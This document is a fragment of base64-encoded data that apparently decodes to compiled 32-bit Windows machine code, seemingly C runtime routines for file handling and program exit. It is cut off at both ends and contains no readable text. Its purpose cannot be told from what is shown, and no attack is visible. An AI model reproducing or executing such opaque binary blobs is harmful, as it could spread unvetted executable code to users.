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c5f//M8CJhTzl//85RRAPhkIFAACJhUTl//+KhSfl//+EwA+FZwEAAIoLi7Uo5f//M8CA+QoPlMCJhSDl//+LBgPHg3g4AHQVilA0iFX0iE31g2A4AGoCjUX0UOtLD77BUOguMAAAWYXAdDqLjTTl//8rywNNEDPAQDvID4alAQAAagKNhUDl//9TUOiyLwAAg8QMg/j/D4SxBAAAQ/+FROX//+sbagFTjYVA5f//UOiOLwAAg8QMg/j/D4SNBAAAM8BQUGoFjU30UWoBjY1A5f//UVD/tRzl//9D/4VE5f///xVw4EAAi/CF9g+EXAQAAGoAjYU85f//UFaNRfRQi4Uo5f//iwD/NAf/FWzgQACFwA+EKQQAAIuFROX//4uNMOX//wPBObU85f//iYU45f//D4wVBAAAg70g5f//AA+EzQAAAGoAjYU85f//UGoBjUX0UIuFKOX//4sAxkX0Df80B/8VbOBAAIXAD4TQAwAAg7085f//AQ+MzwMAAP+FMOX///+FOOX//+mDAAAAPAF0BDwCdSEPtzMzyWaD/goPlMFDQ4OFROX//wKJtUDl//+JjSDl//88AXQEPAJ1Uv+1QOX//+gRUwAAWWY7hUDl//8PhWgDAACDhTjl//8Cg70g5f//AHQpag1YUImFQOX//+jkUgAAWWY7hUDl//8PhTsDAAD/hTjl////hTDl//+LRRA5hUTl//8Pgvn9///pJwMAAIsOihP/hTjl//+IVA80iw6JRA846Q4DAAAzyYsGA8f2QASAD4S/AgAAi4U05f//iY1A5f//hNsPhcoAAACJhTzl//85TRAPhiADAADrBou1KOX//4uNPOX//4OlROX//wArjTTl//+NhUjl//87TRBzOYuVPOX///+FPOX//4oSQYD6CnUQ/4Uw5f//xgANQP+FROX//4gQQP+FROX//4G9ROX///8TAABywovYjYVI5f//K9hqAI2FLOX//1BTjYVI5f//UIsG/zQH/xVs4EAAhcAPhEICAACLhSzl//8BhTjl//87ww+MOgIAAIuFPOX//yuFNOX//ztFEA+CTP///+kgAgAAiYVE5f//gPsCD4XRAAAAOU0QD4ZNAgAA6waLtSjl//+LjUTl//+DpTzl//8AK4005f//jYVI5f//O00Qc0aLlUTl//+DhUTl//8CD7cSQUFmg/oKdRaDhTDl//8Cag1bZokYQECDhTzl//8Cg4U85f//AmaJEEBAgb085f///hMAAHK1i9iNhUjl//8r2GoAjYUs5f//UFONhUjl//9Qiwb/NAf/FWzgQACFwA+EYgEAAIuFLOX//wGFOOX//zvDD4xaAQAAi4VE5f//K4U05f//O0UQD4I/////6UABAAA5TRAPhnwBAACLjUTl//+DpTzl//8AK4005f//agKNhUj5//9eO00QczyLlUTl//8PtxIBtUTl//8DzmaD+gp1DmoNW2aJGAPGAbU85f//AbU85f//ZokQA8aBvTzl//+oBgAAcr8z9lZWaFUNAACNjfDr//9RjY1I+f//K8GZK8LR+FCLwVBWaOn9AAD/FXDgQACL2DveD4SXAAAAagCNhSzl//9Qi8MrxlCNhDXw6///UIuFKOX//4sA/zQH/xVs4EAAhcB0DAO1LOX//zvef8vrDP8VGOBAAImFQOX//zvef1yLhUTl//8rhTTl//+JhTjl//87RRAPggr////rP2oAjY0s5f//Uf91EP+1NOX///8w/xVs4EAAhcB0FYuFLOX//4OlQOX//wCJhTjl///rDP8VGOBAAImFQOX//4O9OOX//wB1bIO9QOX//wB0LWoFXjm1QOX//3UU6D7c///HAAkAAADoRtz//4kw6z//tUDl///oStz//1nrMYu1KOX//4sG9kQHBEB0D4uFNOX//4A4GnUEM8DrJOj+2///xwAcAAAA6Abc//+DIACDyP/rDIuFOOX//yuFMOX//19bi038M81e6BXN///Jw2oQaOD6QADo4+f//4tFCIP4/nUb6Mrb//+DIADor9v//8cACQAAAIPI/+mdAAAAM/87x3wIOwWIK0EAciHoodv//4k46Ifb///HAAkAAABXV1dXV+gP2///g8QU68mLyMH5BY0cjaArQQCL8IPmH8HmBosLD75MMQSD4QF0v1DolEkAAFmJffyLA/ZEMAQBdBb/dRD/dQz/dQjoLvj//4PEDIlF5OsW6CTb///HAAkAAADoLNv//4k4g03k/8dF/P7////oCQAAAItF5Ohj5///w/91COjeSQAAWcPMzMzMzMzMVYvsV1aLdQyLTRCLfQiLwYvRA8Y7/nYIO/gPgqQBAACB+QABAAByH4M9fCtBAAB0FldWg+cPg+YPO/5eX3UIXl9d6VtPAAD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